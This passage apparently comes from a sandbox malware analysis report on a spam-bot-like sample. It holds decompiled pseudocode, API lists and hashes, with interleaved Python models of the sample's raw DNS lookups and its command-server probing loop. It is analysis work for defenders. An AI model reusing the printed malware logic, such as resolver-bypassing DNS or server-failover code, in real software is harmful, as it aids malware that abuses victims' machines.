                                                                                                                                  							_v28 = _t27;
                                                                                                                                  							goto L13;
                                                                                                                                  						} else {
                                                                                                                                  							L13:
                                                                                                                                  							if(_t27 != 0 && _t27 != 0xffffffff) {
                                                                                                                                  								_t31 = E00402CEB(_t33,  &_v32, _a4);
                                                                                                                                  								_pop(_t33);
                                                                                                                                  								_v12 = _t31;
                                                                                                                                  								if(_t31 != 0) {
                                                                                                                                  									goto L17;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L16:
                                                                                                                                  						_t37 =  *_t37;
                                                                                                                                  					} while (_t37 != 0);
                                                                                                                                  					goto L17;
                                                                                                                                  				}
			}
                                                                                                                                  0x00402e78
                                                                                                                                  0x00402e7d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e81
                                                                                                                                  0x00402e84
                                                                                                                                  0x00402e88
                                                                                                                                  0x00402e8f
                                                                                                                                  0x00402e93
                                                                                                                                  0x00402e99
                                                                                                                                  0x00402e9e
                                                                                                                                  0x00402ea6
                                                                                                                                  0x00402eae
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402eb5
                                                                                                                                  0x00402eb7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402eba
                                                                                                                                  0x00402eba
                                                                                                                                  0x00402ebc
                                                                                                                                  0x00402eca
                                                                                                                                  0x00402ed0
                                                                                                                                  0x00402ed1
                                                                                                                                  0x00402ed6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ed6
                                                                                                                                  0x00402ebc
                                                                                                                                  0x00402ed8
                                                                                                                                  0x00402ed8
                                                                                                                                  0x00402eda
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e78

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(iphlpapi.dll,7620EA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                                                                  • htons.WS2_32(00000035), ref: 00402E88
                                                                                                                                  • inet_addr.WS2_32(?), ref: 00402E93
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                                                                  • String ID: GetNetworkParams$iphlpapi.dll
                                                                                                                                  • API String ID: 929413710-2099955842
                                                                                                                                  • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                                                                  • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                                                                  • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                                                                  • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
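The API sequence in the listing above (iphlpapi!GetNetworkParams resolved at runtime, htons(0x35) for port 53, inet_addr and gethostbyname) is what a program needs when it wants to read the host's configured DNS servers and talk to one of them itself instead of going through the Winsock resolver. The block below is an added example, not code from the Joe Sandbox report or from the sample: it builds an A query, sends it to a chosen server on UDP/53, and parses the reply, including name compression and the transaction-id check a careful resolver makes. That the sample builds raw DNS packets in exactly this way is an assumption; the server list, the name "example.test" and the response bytes are constructed for the example.

```python
"""Added example, not code from the Joe Sandbox report or from the sample.
The listing shows the sample resolving iphlpapi!GetNetworkParams (the
documented way to read the host's configured DNS servers), calling
htons(0x35) (port 53) and inet_addr/gethostbyname.  This block shows what a
resolver that sends its own query to a chosen server on UDP/53 has to build
and parse; that the sample does exactly this is an assumption, and the
response below is constructed, not captured traffic."""
import random
import struct

DNS_PORT = 0x35  # 53 decimal, the constant passed to htons in the listing


def build_a_query(name, txid=None):
    """Return a recursion-desired A query (RFC 1035 header + question)."""
    if txid is None:
        txid = random.randrange(0, 0x10000)
    # ID, flags (RD=1), QDCOUNT=1, ANCOUNT, NSCOUNT, ARCOUNT
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _read_name(msg, off):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, end, jumped, hops = [], off, False, 0
    while True:
        length = msg[off]
        if (length & 0xC0) == 0xC0:  # two-byte compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off, hops = True, ptr, hops + 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            if not jumped:
                end = off
            return ".".join(labels), end
        labels.append(msg[off:off + length].decode("ascii"))
        off += length


def parse_a_answers(msg, expected_txid=None):
    """Return the IPv4 strings from the answer section of a DNS response."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if expected_txid is not None and txid != expected_txid:
        raise ValueError("transaction id mismatch")  # cheap anti-spoofing check
    if (flags & 0x8000) == 0:
        raise ValueError("not a response")
    if (flags & 0x000F) != 0:
        raise ValueError("server returned rcode %d" % (flags & 0x000F))
    off = 12
    for _ in range(qdcount):           # skip the echoed question(s)
        _, off = _read_name(msg, off)
        off += 4                       # QTYPE + QCLASS
    addrs = []
    for _ in range(ancount):
        _, off = _read_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rclass == 1 and rdlen == 4:   # A record, IN class
            addrs.append(".".join(str(b) for b in rdata))
    return addrs


# Constructed response: "example.test" -> 192.0.2.10 (documentation range),
# with the answer name given as a pointer (0xC00C) back to the question.
SAMPLE_TXID = 0xBEEF
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", SAMPLE_TXID, 0x8180, 1, 1, 0, 0)
    + b"\x07example\x04test\x00" + struct.pack("!HH", 1, 1)
    + b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([192, 0, 2, 10])
)


def resolve_via(server_ip, name, timeout=2.0):
    """Send the query straight to server_ip:53 (needs network; not run here)."""
    import socket
    query = build_a_query(name)
    txid = struct.unpack("!H", query[:2])[0]
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (server_ip, DNS_PORT))
        data, _ = sock.recvfrom(4096)
    return parse_a_answers(data, txid)
```

From the defender's side the interesting property is the one the sample's API choice implies: a process that reads the DNS server list with GetNetworkParams and then sends to port 53 on its own socket bypasses any resolver-level logging or filtering, so the traffic has to be caught on the wire or by monitoring UDP/53 sends from unexpected processes.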

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32(?), ref: 00AD95A7
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00AD95D5
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00AD95DC
                                                                                                                                  • wsprintfA.USER32 ref: 00AD9635
                                                                                                                                  • wsprintfA.USER32 ref: 00AD9673
                                                                                                                                  • wsprintfA.USER32 ref: 00AD96F4
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 00AD9758
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00AD978D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00AD97D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3696105349-2980165447
                                                                                                                                  • Opcode ID: 55954e61d5c80e698eeb98dbff3eb75aee7b212b9e9189140abe34f1098026de
                                                                                                                                  • Instruction ID: 10fa2c72f7e523973eb5dd47667268336f879b13af878685761b28faf0bc6e60
                                                                                                                                  • Opcode Fuzzy Hash: 55954e61d5c80e698eeb98dbff3eb75aee7b212b9e9189140abe34f1098026de
                                                                                                                                  • Instruction Fuzzy Hash: C3A14BB1900208AFEB21DFA0DD45FDF3BACEB05741F104027FA1696251E7B5D984DBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32 ref: 00AD202D
                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00AD204F
                                                                                                                                  • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 00AD206A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00AD2071
                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00AD2082
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00AD2230
                                                                                                                                    • Part of subcall function 00AD1E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 00AD1E7C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                                                                  • String ID: 0 v$flags_upd$hi_id$localcfg$work_srv
                                                                                                                                  • API String ID: 4207808166-3247798257
                                                                                                                                  • Opcode ID: 11873b88ce4c80726b70a44c2ad5ffb589aabd6faaac21518102ee957b529b84
                                                                                                                                  • Instruction ID: 655be9775e1357474b8b1f91d3b94ec8e4299c67ac0bc3351621450b198cd846
                                                                                                                                  • Opcode Fuzzy Hash: 11873b88ce4c80726b70a44c2ad5ffb589aabd6faaac21518102ee957b529b84
                                                                                                                                  • Instruction Fuzzy Hash: 0E51C2B0500344AFE330AF658D86FA7BAECEF54704F00492EF99786252D7B9A944C7A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
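The decompiled function E00402011 that follows is easier to read once its constants are named: 0xdbba0 is 900 000 ms (15 minutes), the table at 0x412000 is a NUL-terminated list of server strings, and E00401978 is called with 0x50 (80) in the first loop and 0x19 (25) in the second, with bits 4/2 and 8/1 of the byte at offset 0x14 recording the outcome. The block below is an added model of that bookkeeping, not code from the report or the sample: the resolve and port-probe steps are injected callables (that E00402684/E00402EF8 resolve a server and that E00401978 tests a TCP port are assumptions), the clock is faked so it runs offline, and the server names are constructed. It also handles one point the listing cannot settle, the 32-bit wraparound of GetTickCount, by taking the difference modulo 2^32.

```python
"""Added example, not code from the Joe Sandbox report or from the sample.
A readable model of the scheduling and flag bookkeeping in E00402011.
Assumptions: resolve() stands in for E00402684/E00402EF8 and probe_port()
for E00401978(server, port); whether those are really what the sample's
helpers do is not recoverable from the listing alone."""

INTERVAL_MS = 0xDBBA0  # 900_000 ms = 15 minutes, the constant in the listing
PORT_HTTP, PORT_SMTP = 0x50, 0x19  # 80 and 25, the two E00401978 arguments

# Bits OR-ed into the byte at _t96+0x14 by the two loops.
FLAG_SMTP_PORT_OK = 0x1
FLAG_HTTP_PORT_OK = 0x2
FLAG_HTTP_RESOLVED = 0x4
FLAG_SMTP_RESOLVED = 0x8


def tick_elapsed(now, last):
    """Milliseconds since `last` on a 32-bit GetTickCount-style counter.

    Reducing modulo 2**32 keeps the 15-minute test correct across the
    49.7-day wraparound; the signedness of the decompiled comparison is not
    recoverable, so this is the safe form rather than a claim about the sample.
    """
    return (now - last) & 0xFFFFFFFF


class ServerLoop:
    def __init__(self, servers, resolve, probe_port, tick):
        self.servers = list(servers)   # stands in for the NUL-terminated table at 0x412000
        self.resolve = resolve         # server -> bool
        self.probe_port = probe_port   # (server, port) -> bool
        self.tick = tick               # stands in for GetTickCount
        self.last_http = 0             # *0x4122e0
        self.last_smtp = 0             # *0x4122dc
        self.flags = 0                 # byte at _t96+0x14
        self.uptime_s = 0              # dword at _t96+0x28

    def _pass(self, port, resolved_flag, port_ok_flag):
        """First server that resolves AND accepts `port` wins; the rest are skipped."""
        for server in self.servers:
            if not self.resolve(server):
                continue
            self.flags |= resolved_flag
            if self.probe_port(server, port):
                self.flags |= port_ok_flag
                return server
        return None

    def step(self):
        """One trip through the function; returns the servers chosen this time."""
        chosen = {}
        if tick_elapsed(self.tick(), self.last_http) > INTERVAL_MS:
            chosen["http"] = self._pass(PORT_HTTP, FLAG_HTTP_RESOLVED, FLAG_HTTP_PORT_OK)
            self.last_http = self.tick()
        if tick_elapsed(self.tick(), self.last_smtp) > INTERVAL_MS:
            chosen["smtp"] = self._pass(PORT_SMTP, FLAG_SMTP_RESOLVED, FLAG_SMTP_PORT_OK)
            self.last_smtp = self.tick()
        self.uptime_s = self.tick() // 0x3E8   # GetTickCount() / 1000
        return chosen


class FakeClock:
    """Injectable 32-bit millisecond counter so the model runs offline."""
    def __init__(self, start=0):
        self.t = start

    def __call__(self):
        return self.t & 0xFFFFFFFF

    def advance(self, ms):
        self.t += ms


# Constructed scenario (hypothetical names): the first server never resolves,
# the second resolves but refuses port 80, the third accepts both ports.
SERVERS = ["c2-a.invalid", "c2-b.invalid", "c2-c.invalid"]


def demo_resolve(server):
    return server != "c2-a.invalid"


def demo_probe(server, port):
    return server == "c2-c.invalid" or port == PORT_SMTP


def run_demo():
    clock = FakeClock(start=1_000_000)
    loop = ServerLoop(SERVERS, demo_resolve, demo_probe, clock)
    first = loop.step()              # last_* start at 0, so both passes run
    clock.advance(60_000)
    second = loop.step()             # one minute later: nothing is retried
    clock.advance(INTERVAL_MS + 1)
    third = loop.step()              # past 15 minutes: both passes run again
    return first, second, third, loop.flags
```

Two things the model makes visible that are easy to miss in the decompilation: each loop stops at the first server that both resolves and answers on its port, so later entries in the table are never contacted while an earlier one works, and a resolve failure leaves the "resolved" bit clear while a port failure after a successful resolve leaves it set, which is how the flag byte distinguishes DNS trouble from a closed port.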

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E00402011() {
                                                                                                                                  				long _t35;
                                                                                                                                  				void* _t45;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				void* _t51;
                                                                                                                                  				char* _t53;
                                                                                                                                  				char* _t58;
                                                                                                                                  				intOrPtr _t96;
                                                                                                                                  				signed int _t102;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				void* _t104;
                                                                                                                                  				void* _t122;
                                                                                                                                  
                                                                                                                                  				if(( *0x4122f4 & 0x00000001) == 0) {
                                                                                                                                  					 *0x4122f4 =  *0x4122f4 | 0x00000001;
                                                                                                                                  					 *0x4122f0 = E0040F04E(0);
                                                                                                                                  				}
                                                                                                                                  				if(( *0x4122f4 & 0x00000002) == 0) {
                                                                                                                                  					 *0x4122f4 =  *0x4122f4 | 0x00000002;
                                                                                                                                  					 *0x4122ec = E0040F04E(0);
                                                                                                                                  				}
                                                                                                                                  				if(( *0x4122f4 & 0x00000004) == 0) {
                                                                                                                                  					 *0x4122f4 =  *0x4122f4 | 0x00000004;
                                                                                                                                  					 *0x4122e8 = E0040F04E(0);
                                                                                                                                  				}
                                                                                                                                  				_t35 = GetTickCount();
                                                                                                                                  				_t96 =  *((intOrPtr*)(_t104 + 0x114));
                                                                                                                                  				if(_t35 -  *0x4122e0 > 0xdbba0) {
                                                                                                                                  					_t58 =  *0x412000; // 0x410288
                                                                                                                                  					_t103 = 0;
                                                                                                                                  					if( *_t58 != 0) {
                                                                                                                                  						_t60 = 0x412000;
                                                                                                                                  						do {
                                                                                                                                  							if(E00402684( *_t60) == 0) {
                                                                                                                                  								goto L11;
                                                                                                                                  							} else {
                                                                                                                                  								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
                                                                                                                                  								if(E00401978(_t61, 0x50) != 0) {
                                                                                                                                  									_t12 = _t96 + 0x14;
                                                                                                                                  									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
                                                                                                                                  									__eflags =  *_t12;
                                                                                                                                  								} else {
                                                                                                                                  									goto L11;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L14;
                                                                                                                                  							L11:
                                                                                                                                  							_t103 = _t103 + 1;
                                                                                                                                  							_t60 = 0x412000 + _t103 * 4;
                                                                                                                                  						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
                                                                                                                                  					}
                                                                                                                                  					L14:
                                                                                                                                  					 *0x4122e0 = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
                                                                                                                                  					_t53 =  *0x412000; // 0x410288
                                                                                                                                  					_t102 = 0;
                                                                                                                                  					if( *_t53 != 0) {
                                                                                                                                  						_t55 = 0x412000;
                                                                                                                                  						do {
                                                                                                                                  							if(E00402EF8( *_t55) == 0) {
                                                                                                                                  								goto L20;
                                                                                                                                  							} else {
                                                                                                                                  								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
                                                                                                                                  								if(E00401978(_t56, 0x19) != 0) {
                                                                                                                                  									_t18 = _t96 + 0x14;
                                                                                                                                  									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
                                                                                                                                  									__eflags =  *_t18;
                                                                                                                                  								} else {
                                                                                                                                  									goto L20;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L23;
                                                                                                                                  							L20:
                                                                                                                                  							_t102 = _t102 + 1;
                                                                                                                                  							_t55 = 0x412000 + _t102 * 4;
                                                                                                                                  						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
                                                                                                                                  					}
                                                                                                                                  					L23:
                                                                                                                                  					 *0x4122dc = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
                                                                                                                                  				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
                                                                                                                                  				_t45 = E0040F04E(0) -  *0x4122f0;
                                                                                                                                  				_t93 = "localcfg";
                                                                                                                                  				_t122 = _t45 -  *0x4122e4; // 0x0
                                                                                                                                  				if(_t122 > 0) {
                                                                                                                                  					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
                                                                                                                                  					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
                                                                                                                                  					_t104 = _t104 + 0x28;
                                                                                                                                  					if(_t51 == 0) {
                                                                                                                                  						L28:
                                                                                                                                  						 *0x4122e4 = 0x12c;
                                                                                                                                  					} else {
                                                                                                                                  						_t124 =  *((intOrPtr*)(_t104 + 0x10));
                                                                                                                                  						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
                                                                                                                                  							goto L28;
                                                                                                                                  						} else {
                                                                                                                                  							_push(_t104 + 0x10);
                                                                                                                                  							_push(_t51);
                                                                                                                                  							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
                                                                                                                                  							 *0x4122e4 = 0x4b0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t47 = E0040F04E(0) -  *0x4122f0;
                                                                                                                                  				if(_t47 > 0x4b0) {
                                                                                                                                  					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
                                                                                                                                  					_t47 = E0040F04E(0);
                                                                                                                                  					 *0x4122f0 = _t47;
                                                                                                                                  				}
                                                                                                                                  				return _t47;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402078
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004020D4
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004020DB
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040212B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402132
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402142
                                                                                                                                    • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,745CF210,80000001,00000000,0040E513,?,?,?,?,000000E4), ref: 0040F089
                                                                                                                                    • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,745CF210,80000001,00000000,0040E513,?,?,?,?,000000E4,000000C8), ref: 0040F093
                                                                                                                                    • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                                                                    • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                                                                    • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                                                                  • String ID: 0 v$localcfg$net_type$rbl_bl$rbl_ip
                                                                                                                                  • API String ID: 3976553417-1551482228
                                                                                                                                  • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                                                                  • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                                                                  • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                                                                  • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040BE31(signed int _a4, intOrPtr _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				CHAR* _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				int _t50;
                                                                                                                                  				int _t51;
                                                                                                                                  				intOrPtr _t52;
                                                                                                                                  				intOrPtr _t55;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t59;
                                                                                                                                  				char* _t66;
                                                                                                                                  				CHAR* _t68;
                                                                                                                                  				int _t71;
                                                                                                                                  				int _t72;
                                                                                                                                  				void* _t76;
                                                                                                                                  				intOrPtr _t78;
                                                                                                                                  				signed int _t82;
                                                                                                                                  				signed int _t83;
                                                                                                                                  				signed int _t84;
                                                                                                                                  				intOrPtr* _t86;
                                                                                                                                  				void* _t88;
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t92;
                                                                                                                                  
                                                                                                                                  				_t83 = _a4;
                                                                                                                                  				_t68 = _t83 + 4;
                                                                                                                                  				_v12 = _t68;
                                                                                                                                  				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
                                                                                                                                  					L3:
                                                                                                                                  					_t72 = 0;
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					if(_a8 == 3) {
                                                                                                                                  						L25:
                                                                                                                                  						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
                                                                                                                                  							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
                                                                                                                                  								_t50 = lstrcmpiA(_v12, "smtp_retr");
                                                                                                                                  								_t51 = 0x413638;
                                                                                                                                  								if(_t50 != 0) {
                                                                                                                                  									_t51 = _a4;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t51 = 0x413634;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							_t51 = 0x413630;
                                                                                                                                  						}
                                                                                                                                  						_t86 =  *_t51;
                                                                                                                                  						 *_t51 = _v16;
                                                                                                                                  						if(_t86 == 0) {
                                                                                                                                  							goto L36;
                                                                                                                                  						} else {
                                                                                                                                  							_t52 =  *_t86;
                                                                                                                                  							_t84 = 0;
                                                                                                                                  							while(_t52 != 0) {
                                                                                                                                  								E0040EC2E(_t52);
                                                                                                                                  								_t84 = _t84 + 1;
                                                                                                                                  								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
                                                                                                                                  							}
                                                                                                                                  							return E0040EC2E(_t86);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t55 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                                                                  					_t82 = 0;
                                                                                                                                  					if(_t55 <= 0) {
                                                                                                                                  						goto L25;
                                                                                                                                  					} else {
                                                                                                                                  						goto L5;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						L5:
                                                                                                                                  						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
                                                                                                                                  							_t82 = _t82 + 1;
                                                                                                                                  						}
                                                                                                                                  						_t72 = _t72 + 1;
                                                                                                                                  					} while (_t72 < _t55);
                                                                                                                                  					if(_t82 == 0) {
                                                                                                                                  						goto L25;
                                                                                                                                  					}
                                                                                                                                  					_t70 = 4 + _t82 * 4;
                                                                                                                                  					_t51 = E0040EBCC(4 + _t82 * 4);
                                                                                                                                  					_pop(_t76);
                                                                                                                                  					_v16 = _t51;
                                                                                                                                  					if(_t51 == 0) {
                                                                                                                                  						goto L36;
                                                                                                                                  					}
                                                                                                                                  					E0040EE2A(_t76, _t51, 0, _t70);
                                                                                                                                  					_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                                                                  					_v8 = _v8 & 0x00000000;
                                                                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                                                                  					_t92 = _t91 + 0xc;
                                                                                                                                  					if(_t57 > 0) {
                                                                                                                                  						_t71 = _v16;
                                                                                                                                  						do {
                                                                                                                                  							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
                                                                                                                                  							if(_t78 == 0xa || _a4 == _t57 - 1) {
                                                                                                                                  								_t88 = _a4 - _v8;
                                                                                                                                  								if(_t78 != 0xa) {
                                                                                                                                  									_t88 = _t88 + 1;
                                                                                                                                  								}
                                                                                                                                  								_t25 = _t88 + 1; // 0x1
                                                                                                                                  								_t59 = E0040EBCC(_t25);
                                                                                                                                  								 *_t71 = _t59;
                                                                                                                                  								if(_t59 == 0) {
                                                                                                                                  									goto L25;
                                                                                                                                  								} else {
                                                                                                                                  									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
                                                                                                                                  									_t92 = _t92 + 0xc;
                                                                                                                                  									 *((char*)(_t88 +  *_t71)) = 0;
                                                                                                                                  									if(_t88 > 0) {
                                                                                                                                  										_t31 =  *_t71 - 1; // -1
                                                                                                                                  										_t66 = _t88 + _t31;
                                                                                                                                  										if( *_t66 == 0xd) {
                                                                                                                                  											 *_t66 = 0;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  									_t71 = _t71 + 4;
                                                                                                                                  									_v8 = _v8 + _t88 + 1;
                                                                                                                                  									goto L22;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L22:
                                                                                                                                  							_a4 = _a4 + 1;
                                                                                                                                  							_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                                                                  						} while (_a4 < _t57);
                                                                                                                                  					}
                                                                                                                                  					goto L25;
                                                                                                                                  				} else {
                                                                                                                                  					_t51 = lstrcmpiA(_t68, "smtp_retr");
                                                                                                                                  					if(_t51 != 0) {
                                                                                                                                  						L36:
                                                                                                                                  						return _t51;
                                                                                                                                  					}
                                                                                                                                  					goto L3;
